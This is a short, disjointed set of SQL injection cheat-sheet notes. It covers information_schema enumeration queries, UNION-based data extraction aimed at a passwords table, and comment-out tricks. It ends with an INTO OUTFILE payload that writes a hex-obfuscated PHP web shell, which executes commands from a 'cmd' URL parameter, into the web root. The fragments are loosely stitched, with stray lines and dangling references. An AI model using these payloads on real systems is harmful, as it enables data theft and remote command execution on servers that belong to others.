SELECT table_schema, table_name, 1 FROM information_schema.tables
SELECT table_name, column_name, 1 FROM information_schema.columns
It's done by commenting out the rest of the query with -- and providing + as the blank space at the end.
The UNION keyword lets you execute one or more additional SELECT queries and append the results to the original query. For example:
SELECT 1, 2 FROM usernames UNION SELECT 1, 2 FROM passwords
A UNION SQLi attack consists of 3 stages:
1. Determine the number of columns you can retrieve.
2. Make sure that the columns you found are in a suitable format.
3. Attack and get some interesting data.
@@version
Example:
INTO OUTFILE '/var/www/html/shell.php' LINES TERMINATED BY 0x3C3F706870206563686F20223C7072653E22202E207368656C6C5F6578656328245F4745545B22636D64225D29202E20223C2F7072653E223B3F3E